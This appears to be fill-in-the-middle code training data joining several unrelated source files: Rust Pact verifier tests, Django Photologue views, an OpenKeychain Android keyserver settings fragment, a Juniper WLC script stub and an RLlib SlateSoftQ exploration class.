fn if_the_state_filter_is_empty_returns_false_if_the_interaction_state_is_defined() {
  let interaction = RequestResponseInteraction { provider_states: vec![ ProviderState::default(&"bobby".to_string()) ], .. RequestResponseInteraction::default() };
  expect!(filter_interaction(&interaction, &FilterInfo::State("".to_string()))).to(be_false());
}

#[test]
fn if_the_state_filter_is_empty_returns_true_if_the_interaction_state_is_not_defined() {
  let interaction = RequestResponseInteraction { provider_states: vec![], .. RequestResponseInteraction::default() };
  expect!(filter_interaction(&interaction, &FilterInfo::State("".to_string()))).to(be_true());
}

#[test]
fn if_the_state_filter_and_interaction_filter_is_defined_must_match_both() {
  let interaction = RequestResponseInteraction { description: "freddy".to_string(), provider_states: vec![ ProviderState::default(&"bobby".to_string()) ], .. RequestResponseInteraction::default() };
  expect!(filter_interaction(&interaction, &FilterInfo::DescriptionAndState(".*ddy".to_string(), "bob.*".to_string()))).to(be_true());
}

#[test]
fn if_the_state_filter_and_interaction_filter_is_defined_is_false_if_the_provider_state_does_not_match() {
  let interaction = RequestResponseInteraction { description: "freddy".to_string(), provider_states: vec![ ProviderState::default(&"boddy".to_string()) ], .. RequestResponseInteraction::default() };
  expect!(filter_interaction(&interaction, &FilterInfo::DescriptionAndState(".*ddy".to_string(), "bob.*".to_string()))).to(be_false());
}

#[test]
fn if_the_state_filter_and_interaction_filter_is_defined_is_false_if_the_description_does_not_match() {
  let interaction = RequestResponseInteraction { description: "frebby".to_string(), provider_states: vec![ ProviderState::default(&"bobby".to_string()) ], .. RequestResponseInteraction::default() };
  expect!(filter_interaction(&interaction, &FilterInfo::DescriptionAndState(".*ddy".to_string(), "bob.*".to_string()))).to(be_false());
}

#[test]
fn if_the_state_filter_and_interaction_filter_is_defined_is_false_if_both_do_not_match() {
  let interaction = RequestResponseInteraction { description: "joe".to_string(), provider_states: vec![ ProviderState::default(&"author".to_string()) ], .. RequestResponseInteraction::default() };
  expect!(filter_interaction(&interaction, &FilterInfo::DescriptionAndState(".*ddy".to_string(), "bob.*".to_string()))).to(be_false());
}

#[test]
fn if_no_consumer_filter_is_defined_returns_true() {
  let consumers = vec![];
  let result = Err("".to_string());
  expect!(filter_consumers(&consumers, &result)).to(be_true());
}

#[test]
fn if_a_consumer_filter_is_defined_returns_false_if_the_consumer_name_does_not_match() {
  let consumers = vec!["fred".to_string(), "joe".to_string()];
  let result = Ok((Box::new(RequestResponsePact { consumer: Consumer { name: "bob".to_string() }, .. RequestResponsePact::default() }) as Box<dyn Pact + Send + Sync>, None, PactSource::Unknown));
  expect!(filter_consumers(&consumers, &result)).to(be_false());
}

#[test]
fn if_a_consumer_filter_is_defined_returns_true_if_the_result_is_an_error() {
  let consumers = vec!["fred".to_string(), "joe".to_string()];
  let result = Err("".to_string());
  expect!(filter_consumers(&consumers, &result)).to(be_true());
}

#[test]
fn if_a_consumer_filter_is_defined_returns_true_if_the_consumer_name_does_match() {
  let consumers = vec!["fred".to_string(), "joe".to_string(), "bob".to_string()];
  let result = Ok((Box::new(RequestResponsePact { consumer: Consumer { name: "bob".to_string() }, .. RequestResponsePact::default() }) as Box<dyn Pact + Send + Sync>, None, PactSource::Unknown));
  expect!(filter_consumers(&consumers, &result)).to(be_true());
}

#[tokio::test]
async fn test_state_change_with_parameters() {
  try_init().unwrap_or(());

  let server = PactBuilder::new("RustPactVerifier", "SomeRunningProvider")
    .interaction("a state change request", "", |mut i| async move {
      i.request.method("POST");
      i.request.path("/");
      i.request.header("Content-Type", "application/json");
      i.request.body("{\"params\":{\"A\":\"1\",\"B\":\"2\"},\"action\":\"setup\",\"state\":\"TestState\"}");
      i.response.status(200);
      i
    })
    .await
    .start_mock_server();

  let provider_state = ProviderState {
    name: "TestState".to_string(),
    params: hashmap!{
      "A".to_string() => json!("1"),
      "B".to_string() => json!("2")
    }
  };

  let provider_state_executor = Arc::new(HttpRequestProviderStateExecutor {
    state_change_url: Some(server.url().to_string()),
    .. HttpRequestProviderStateExecutor::default()
  });
  let client = reqwest::Client::new();

  let result = execute_state_change(&provider_state, true, None, &client, provider_state_executor).await;
  expect!(result.clone()).to(be_ok());
}

#[tokio::test]
async fn test_state_change_with_parameters_in_query() {
  try_init().unwrap_or(());

  let server = PactBuilder::new("RustPactVerifier", "SomeRunningProvider")
    .interaction("a state change request with params in the query string", "", |mut i| async move {
      i.comment("testing state change with parameters in the query");
      i.test_name("test_state_change_with_parameters_in_query");
      i.request.method("POST");
      i.request.path("/");
      i.request.query_param("state", "TestState");
      i.request.query_param("action", "setup");
      i.request.query_param("A", "1");
      i.request.query_param("B", "2");
      i.response.status(200);
      i
    })
    .await
    .start_mock_server();

  let provider_state = ProviderState {
    name: "TestState".to_string(),
    params: hashmap!{
      "A".to_string() => json!("1"),
      "B".to_string() => json!("2")
    }
  };

  let provider_state_executor = Arc::new(HttpRequestProviderStateExecutor {
    state_change_url: Some(server.url().to_string()),
    state_change_body: false,
    .. HttpRequestProviderStateExecutor::default()
  });
  let client = reqwest::Client::new();

  let result = execute_state_change(&provider_state, true, None, &client, provider_state_executor).await;
  expect!(result.clone()).to(be_ok());
}

#[tokio::test]
async fn test_state_change_returning_json_values() {
  try_init().unwrap_or(());

  let server = PactBuilder::new("RustPactVerifier", "SomeRunningProvider")
    .interaction("a state change request which returns a map of values", "", |mut i| async move {
      i.request.method("POST");
      i.request.path("/");
      i.request.header("Content-Type", "application/json");
      i.request.body("{\"action\":\"setup\",\"state\":\"TestState\",\"params\":{}}");
      i.response.status(200);
      i.response.header("Content-Type", "application/json");
      i.response.body("{\"a\": \"A\", \"b\": 100}");
      i
    })
    .await
    .start_mock_server();

  let provider_state = ProviderState {
    name: "TestState".to_string(),
    params: hashmap!{}
  };

  let provider_state_executor = Arc::new(HttpRequestProviderStateExecutor {
    state_change_url: Some(server.url().to_string()),
    .. HttpRequestProviderStateExecutor::default()
  });
  let client = reqwest::Client::new();

  let result = execute_state_change(&provider_state, true, None, &client, provider_state_executor).await;
  expect!(result.clone()).to(be_ok().value(hashmap! {
    "a".into() => json!("A"),
    "b".into() => json!(100)
  }));
}

#[test]
fn publish_result_does_nothing_if_not_from_broker() {
  try_init().unwrap_or(());

  let server_response = catch_unwind(|| {
    let runtime = tokio::runtime::Builder::new_current_thread()
      .enable_all()
      .build()
      .unwrap();

    runtime.block_on(async {
      let _server = PactBuilder::new("RustPactVerifier", "PactBroker")
        .interaction("publish results", "", |mut i| async move {
          i.request.method("POST");
          i.request.path("/");
          i.response.status(201);
          i
        })
        .await
        .start_mock_server();

      let options = super::PublishOptions {
        provider_version: None,
        build_url: None,
        provider_tags: vec![],<|fim▁hole|>
    })
  });
  expect!(server_response).to(be_err());
}

#[tokio::test]
async fn publish_successful_result_to_broker() {
  try_init().unwrap_or(());

  let server = PactBuilder::new("RustPactVerifier", "PactBroker")
    .interaction("publish results", "", |mut i| async move {
      i.request.method("POST");
      i.request.path("/path/to/pact/verification");
      i.request.json_body(json_pattern!({
        "providerApplicationVersion": "1",
        "success": true,
        "testResults": [
          { "interactionId": "1", "success": true }
        ],
        "verifiedBy": json!({
          "implementation": "Pact-Rust",
          "version": PACT_RUST_VERSION
        })
      }));
      i.response.status(201);
      i
    })
    .await
    .start_mock_server();

  let options = super::PublishOptions {
    provider_version: Some("1".into()),
    .. super::PublishOptions::default()
  };

  let links = vec![
    Link {
      name: "pb:publish-verification-results".to_string(),
      href: Some(server.path("/path/to/pact/verification".to_string()).to_string()),
      templated: false,
      title: None
    }
  ];
  let source = PactSource::BrokerUrl("Test".to_string(), server.url().to_string(), None, links);
  super::publish_result(&vec![(Some("1".to_string()), Ok(()))], &source, &options).await;
}<|fim▁end|>
        .. super::PublishOptions::default()
      };

      super::publish_result(&vec![], &PactSource::File("/tmp/test".into()), &options).await;
<|file_name|>views.py<|end_file_name|><|fim▁begin|>import warnings

from django.views.generic.dates import ArchiveIndexView, DateDetailView, DayArchiveView, MonthArchiveView, \
    YearArchiveView<|fim▁hole|>
from .models import Photo, Gallery

# Gallery views.


class GalleryListView(ListView):
    queryset = Gallery.objects.on_site().is_public()
    paginate_by = 20


class GalleryDetailView(DetailView):
    queryset = Gallery.objects.on_site().is_public()


class GalleryDateView(object):
    queryset = Gallery.objects.on_site().is_public()
    date_field = 'date_added'
    allow_empty = True


class GalleryDateDetailView(GalleryDateView, DateDetailView):
    pass


class GalleryArchiveIndexView(GalleryDateView, ArchiveIndexView):
    pass


class GalleryDayArchiveView(GalleryDateView, DayArchiveView):
    pass


class GalleryMonthArchiveView(GalleryDateView, MonthArchiveView):
    pass


class GalleryYearArchiveView(GalleryDateView, YearArchiveView):
    make_object_list = True


# Photo views.


class PhotoListView(ListView):
    queryset = Photo.objects.on_site().is_public()
    paginate_by = 20


class PhotoDetailView(DetailView):
    queryset = Photo.objects.on_site().is_public()


class PhotoDateView(object):
    queryset = Photo.objects.on_site().is_public()
    date_field = 'date_added'
    allow_empty = True


class PhotoDateDetailView(PhotoDateView, DateDetailView):
    pass


class PhotoArchiveIndexView(PhotoDateView, ArchiveIndexView):
    pass


class PhotoDayArchiveView(PhotoDateView, DayArchiveView):
    pass


class PhotoMonthArchiveView(PhotoDateView, MonthArchiveView):
    pass


class PhotoYearArchiveView(PhotoDateView, YearArchiveView):
    make_object_list = True


# Deprecated views.


class DeprecatedMonthMixin(object):
    """Representation of months in urls has changed from a alpha representation ('jan' for January)
    to a numeric representation ('01' for January).
    Properly deprecate the previous urls."""

    query_string = True

    month_names = {'jan': '01', 'feb': '02', 'mar': '03', 'apr': '04', 'may': '05', 'jun': '06',
                   'jul': '07', 'aug': '08', 'sep': '09', 'oct': '10', 'nov': '11', 'dec': '12', }

    def get_redirect_url(self, *args, **kwargs):
        print('a')
        warnings.warn(
            DeprecationWarning('Months are now represented in urls by numbers rather than by '
                               'their first 3 letters. The old style will be removed in Photologue 3.4.'))


class GalleryDateDetailOldView(DeprecatedMonthMixin, RedirectView):
    permanent = True

    def get_redirect_url(self, *args, **kwargs):
        super(GalleryDateDetailOldView, self).get_redirect_url(*args, **kwargs)
        return reverse('photologue:gallery-detail', kwargs={'year': kwargs['year'],
                                                            'month': self.month_names[kwargs['month']],
                                                            'day': kwargs['day'],
                                                            'slug': kwargs['slug']})


class GalleryDayArchiveOldView(DeprecatedMonthMixin, RedirectView):
    permanent = True

    def get_redirect_url(self, *args, **kwargs):
        super(GalleryDayArchiveOldView, self).get_redirect_url(*args, **kwargs)
        return reverse('photologue:gallery-archive-day', kwargs={'year': kwargs['year'],
                                                                 'month': self.month_names[kwargs['month']],
                                                                 'day': kwargs['day']})


class GalleryMonthArchiveOldView(DeprecatedMonthMixin, RedirectView):
    permanent = True

    def get_redirect_url(self, *args, **kwargs):
        super(GalleryMonthArchiveOldView, self).get_redirect_url(*args, **kwargs)
        return reverse('photologue:gallery-archive-month', kwargs={'year': kwargs['year'],
                                                                   'month': self.month_names[kwargs['month']]})


class PhotoDateDetailOldView(DeprecatedMonthMixin, RedirectView):
    permanent = True

    def get_redirect_url(self, *args, **kwargs):
        super(PhotoDateDetailOldView, self).get_redirect_url(*args, **kwargs)
        return reverse('photologue:photo-detail', kwargs={'year': kwargs['year'],
                                                          'month': self.month_names[kwargs['month']],
                                                          'day': kwargs['day'],
                                                          'slug': kwargs['slug']})


class PhotoDayArchiveOldView(DeprecatedMonthMixin, RedirectView):
    permanent = True

    def get_redirect_url(self, *args, **kwargs):
        super(PhotoDayArchiveOldView, self).get_redirect_url(*args, **kwargs)
        return reverse('photologue:photo-archive-day', kwargs={'year': kwargs['year'],
                                                               'month': self.month_names[kwargs['month']],
                                                               'day': kwargs['day']})


class PhotoMonthArchiveOldView(DeprecatedMonthMixin, RedirectView):
    permanent = True

    def get_redirect_url(self, *args, **kwargs):
        super(PhotoMonthArchiveOldView, self).get_redirect_url(*args, **kwargs)
        return reverse('photologue:photo-archive-month', kwargs={'year': kwargs['year'],
                                                                 'month': self.month_names[kwargs['month']]})<|fim▁end|>
from django.views.generic.detail import DetailView
from django.views.generic.list import ListView
from django.views.generic.base import RedirectView
from django.core.urlresolvers import reverse
<|file_name|>SettingsKeyserverFragment.java<|end_file_name|><|fim▁begin|>/*
 * Copyright (C) 2012-2015 Dominik Schürmann <[email protected]>
 * Copyright (C) 2015 Adithya Abraham Philip <[email protected]>
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program. If not, see <http://www.gnu.org/licenses/>.
 */

package org.sufficientlysecure.keychain.ui;

import android.os.Bundle;
import android.os.Handler;
import android.os.Message;
import android.os.Messenger;
import android.support.v4.app.Fragment;
import android.support.v4.view.MotionEventCompat;
import android.support.v7.widget.LinearLayoutManager;
import android.support.v7.widget.RecyclerView;
import android.support.v7.widget.helper.ItemTouchHelper;
import android.view.LayoutInflater;
import android.view.Menu;
import android.view.MenuInflater;
import android.view.MenuItem;
import android.view.MotionEvent;
import android.view.View;
import android.view.ViewGroup;
import android.widget.ImageView;
import android.widget.TextView;

import org.sufficientlysecure.keychain.R;
import org.sufficientlysecure.keychain.ui.dialog.AddEditKeyserverDialogFragment;
import org.sufficientlysecure.keychain.ui.util.FormattingUtils;
import org.sufficientlysecure.keychain.ui.util.Notify;
import org.sufficientlysecure.keychain.ui.util.recyclerview.ItemTouchHelperAdapter;
import org.sufficientlysecure.keychain.ui.util.recyclerview.ItemTouchHelperDragCallback;
import org.sufficientlysecure.keychain.ui.util.recyclerview.ItemTouchHelperViewHolder;
import org.sufficientlysecure.keychain.ui.util.recyclerview.RecyclerItemClickListener;
import org.sufficientlysecure.keychain.keyimport.ParcelableHkpKeyserver;
import org.sufficientlysecure.keychain.util.Preferences;

import java.util.ArrayList;
import java.util.Collections;

public class SettingsKeyserverFragment extends Fragment implements RecyclerItemClickListener.OnItemClickListener {

    private static final String ARG_KEYSERVER_ARRAY = "arg_keyserver_array";

    private ItemTouchHelper mItemTouchHelper;

    private ArrayList<ParcelableHkpKeyserver> mKeyservers;
    private KeyserverListAdapter mAdapter;

    public static SettingsKeyserverFragment newInstance(ArrayList<ParcelableHkpKeyserver> keyservers) {
        Bundle args = new Bundle();
        args.putParcelableArrayList(ARG_KEYSERVER_ARRAY, keyservers);

        SettingsKeyserverFragment fragment = new SettingsKeyserverFragment();
        fragment.setArguments(args);

        return fragment;
    }

    @Override
    public View onCreateView(LayoutInflater inflater, ViewGroup container,
                             Bundle savedInstanceState) {
        return inflater.inflate(R.layout.settings_keyserver_fragment, null);
    }

    @Override
    public void onViewCreated(View view, Bundle savedInstanceState) {
        super.onViewCreated(view, savedInstanceState);

        mKeyservers = getArguments().getParcelableArrayList(ARG_KEYSERVER_ARRAY);
        mAdapter = new KeyserverListAdapter(mKeyservers);

        RecyclerView recyclerView = (RecyclerView) view.findViewById(R.id.keyserver_recycler_view);
        // recyclerView.setHasFixedSize(true); // the size of the first item changes
        recyclerView.setAdapter(mAdapter);
        recyclerView.setLayoutManager(new LinearLayoutManager(getActivity()));

        ItemTouchHelper.Callback callback = new ItemTouchHelperDragCallback(mAdapter);
        mItemTouchHelper = new ItemTouchHelper(callback);
        mItemTouchHelper.attachToRecyclerView(recyclerView);

        // for clicks
        recyclerView.addOnItemTouchListener(new RecyclerItemClickListener(getActivity(), this));

        // can't use item decoration because it doesn't move with drag and drop
        // recyclerView.addItemDecoration(new DividerItemDecoration(getActivity(), null));

        // We have a menu item to show in action bar.
        setHasOptionsMenu(true);
    }

    @Override
    public void onCreateOptionsMenu(final Menu menu, final MenuInflater inflater) {
        inflater.inflate(R.menu.keyserver_pref_menu, menu);

        super.onCreateOptionsMenu(menu, inflater);
    }

    @Override
    public boolean onOptionsItemSelected(MenuItem item) {
        switch (item.getItemId()) {
            case R.id.menu_add_keyserver:
                startAddKeyserverDialog();
                return true;
            default:
                return super.onOptionsItemSelected(item);
        }
    }

    private void startAddKeyserverDialog() {
        // keyserver and position have no meaning
        startEditKeyserverDialog(AddEditKeyserverDialogFragment.DialogAction.ADD, null, -1);
    }

    private void startEditKeyserverDialog(AddEditKeyserverDialogFragment.DialogAction action,
                                          ParcelableHkpKeyserver keyserver, final int position) {
        Handler returnHandler = new Handler() {
            @Override
            public void handleMessage(Message message) {
                Bundle data = message.getData();
                switch (message.what) {
                    case AddEditKeyserverDialogFragment.MESSAGE_OKAY: {
                        boolean deleted = data.getBoolean(AddEditKeyserverDialogFragment.MESSAGE_KEYSERVER_DELETED
                                , false);
                        if (deleted) {
                            Notify.create(getActivity(),
                                    getActivity().getString(
                                            R.string.keyserver_preference_deleted, mKeyservers.get(position)),
                                    Notify.Style.OK)
                                    .show();
                            deleteKeyserver(position);
                            return;
                        }
                        boolean verified = data.getBoolean(AddEditKeyserverDialogFragment.MESSAGE_VERIFIED);
                        if (verified) {
                            Notify.create(getActivity(),
                                    R.string.add_keyserver_connection_verified, Notify.Style.OK).show();
                        } else {
                            Notify.create(getActivity(),
                                    R.string.add_keyserver_without_verification,
                                    Notify.Style.WARN).show();
                        }
                        ParcelableHkpKeyserver keyserver = data.getParcelable(
                                AddEditKeyserverDialogFragment.MESSAGE_KEYSERVER);
                        AddEditKeyserverDialogFragment.DialogAction dialogAction =
                                (AddEditKeyserverDialogFragment.DialogAction) data.getSerializable(
                                        AddEditKeyserverDialogFragment.MESSAGE_DIALOG_ACTION);
                        switch (dialogAction) {
                            case ADD:<|fim▁hole|>
                            case EDIT:
                                editKeyserver(keyserver, position);
                                break;
                        }
                        break;
                    }
                }
            }
        };

        // Create a new Messenger for the communication back
        Messenger messenger = new Messenger(returnHandler);
        AddEditKeyserverDialogFragment dialogFragment = AddEditKeyserverDialogFragment
                .newInstance(messenger, action, keyserver, position);
        dialogFragment.show(getFragmentManager(), "addKeyserverDialog");
    }

    private void addKeyserver(ParcelableHkpKeyserver keyserver) {
        mKeyservers.add(keyserver);
        mAdapter.notifyItemInserted(mKeyservers.size() - 1);
        saveKeyserverList();
    }

    private void editKeyserver(ParcelableHkpKeyserver newKeyserver, int position) {
        mKeyservers.set(position, newKeyserver);
        mAdapter.notifyItemChanged(position);
        saveKeyserverList();
    }

    private void deleteKeyserver(int position) {
        if (mKeyservers.size() == 1) {
            Notify.create(getActivity(), R.string.keyserver_preference_cannot_delete_last,
                    Notify.Style.ERROR).show();
            return;
        }
        mKeyservers.remove(position); // we use this
        mAdapter.notifyItemRemoved(position);
        if (position == 0 && mKeyservers.size() > 0) {
            // if we deleted the first item, we need the adapter to redraw the new first item
            mAdapter.notifyItemChanged(0);
        }
        saveKeyserverList();
    }

    private void saveKeyserverList() {
        Preferences.getPreferences(getActivity()).setKeyServers(mKeyservers);
    }

    @Override
    public void onItemClick(View view, int position) {
        startEditKeyserverDialog(AddEditKeyserverDialogFragment.DialogAction.EDIT,
                mKeyservers.get(position), position);
    }

    public class KeyserverListAdapter extends RecyclerView.Adapter<KeyserverListAdapter.ViewHolder>
            implements ItemTouchHelperAdapter {

        private final ArrayList<ParcelableHkpKeyserver> mKeyservers;

        public KeyserverListAdapter(ArrayList<ParcelableHkpKeyserver> keyservers) {
            mKeyservers = keyservers;
        }

        @Override
        public ViewHolder onCreateViewHolder(ViewGroup parent, int viewType) {
            View view = LayoutInflater.from(parent.getContext())
                    .inflate(R.layout.settings_keyserver_item, parent, false);
            return new ViewHolder(view);
        }

        @Override
        public void onBindViewHolder(final ViewHolder holder, int position) {
            holder.keyserverUrl.setText(mKeyservers.get(position).getUrl());

            // Start a drag whenever the handle view it touched
            holder.dragHandleView.setOnTouchListener(new View.OnTouchListener() {
                @Override
                public boolean onTouch(View v, MotionEvent event) {
                    if (MotionEventCompat.getActionMasked(event) == MotionEvent.ACTION_DOWN) {
                        mItemTouchHelper.startDrag(holder);
                    }
                    return false;
                }
            });

            selectUnselectKeyserver(holder, position);
        }

        private void selectUnselectKeyserver(ViewHolder holder, int position) {
            if (position == 0) {
                holder.showAsSelectedKeyserver();
            } else {
                holder.showAsUnselectedKeyserver();
            }
        }

        @Override
        public void onItemMove(RecyclerView.ViewHolder source, RecyclerView.ViewHolder target,
                               int fromPosition, int toPosition) {
            Collections.swap(mKeyservers, fromPosition, toPosition);
            saveKeyserverList();
            selectUnselectKeyserver((ViewHolder) target, fromPosition);
            // we don't want source to change color while dragging, therefore we just set
            // isSelectedKeyserver instead of selectUnselectKeyserver
            ((ViewHolder) source).isSelectedKeyserver = toPosition == 0;
            notifyItemMoved(fromPosition, toPosition);
        }

        @Override
        public int getItemCount() {
            return mKeyservers.size();
        }

        public class ViewHolder extends RecyclerView.ViewHolder implements
                ItemTouchHelperViewHolder {

            public final ViewGroup outerLayout;
            public final TextView selectedServerLabel;
            public final TextView keyserverUrl;
            public final ImageView dragHandleView;

            private boolean isSelectedKeyserver = false;

            public ViewHolder(View itemView) {
                super(itemView);
                outerLayout = (ViewGroup) itemView.findViewById(R.id.outer_layout);
                selectedServerLabel = (TextView) itemView.findViewById(
                        R.id.selected_keyserver_title);
                keyserverUrl = (TextView) itemView.findViewById(R.id.keyserver_tv);
                dragHandleView = (ImageView) itemView.findViewById(R.id.drag_handle);

                itemView.setClickable(true);
            }

            public void showAsSelectedKeyserver() {
                isSelectedKeyserver = true;
                selectedServerLabel.setVisibility(View.VISIBLE);
                outerLayout.setBackgroundColor(FormattingUtils.getColorFromAttr(getContext(),
                        R.attr.colorPrimaryDark));
            }

            public void showAsUnselectedKeyserver() {
                isSelectedKeyserver = false;
                selectedServerLabel.setVisibility(View.GONE);
                outerLayout.setBackgroundColor(0);
            }

            @Override
            public void onItemSelected() {
                selectedServerLabel.setVisibility(View.GONE);
                itemView.setBackgroundColor(FormattingUtils.getColorFromAttr(getContext(),
                        R.attr.colorBrightToolbar));
            }

            @Override
            public void onItemClear() {
                if (isSelectedKeyserver) {
                    showAsSelectedKeyserver();
                } else {
                    showAsUnselectedKeyserver();
                }
            }
        }
    }
}<|fim▁end|>
                                addKeyserver(keyserver);
                                break;
<|file_name|>maker.py<|end_file_name|><|fim▁begin|>import demowlcutils
from demowlcutils import ppxml, WLC_login
from pprint import pprint as pp

from jnpr.wlc import WirelessLanController as WLC

wlc = WLC(host='a', user='b', password='c')

r = wlc.RpcMaker( target='vlan', name='Jeremy')

# you can access the following attributes, refer to the jnpr.wlc.builder
# file for more details

# r.cmd
# r.target<|fim▁hole|><|fim▁end|>
# r.args
<|file_name|>slate_soft_q.py<|end_file_name|><|fim▁begin|>from typing import Union

from ray.rllib.models.action_dist import ActionDistribution
from ray.rllib.utils.annotations import override
from ray.rllib.utils.exploration.exploration import TensorType
from ray.rllib.utils.exploration.soft_q import SoftQ
from ray.rllib.utils.framework import try_import_tf, try_import_torch

tf1, tf, tfv = try_import_tf()
torch, _ = try_import_torch()


class SlateSoftQ(SoftQ):
    @override(SoftQ)
    def get_exploration_action(
        self,
        action_distribution: ActionDistribution,
        timestep: Union[int, TensorType],
        explore: bool = True,
    ):<|fim▁hole|>
        assert (
            self.framework == "torch"
        ), "ERROR: SlateSoftQ only supports torch so far!"

        cls = type(action_distribution)

        # Re-create the action distribution with the correct temperature
        # applied.
        action_distribution = cls(
            action_distribution.inputs, self.model, temperature=self.temperature
        )

        batch_size = action_distribution.inputs.size()[0]
        action_logp = torch.zeros(batch_size, dtype=torch.float)

        self.last_timestep = timestep

        # Explore.
        if explore:
            # Return stochastic sample over (q-value) logits.
            action = action_distribution.sample()

        # Return the deterministic "sample" (argmax) over (q-value) logits.
        else:
            action = action_distribution.deterministic_sample()

        return action, action_logp<|fim▁end|>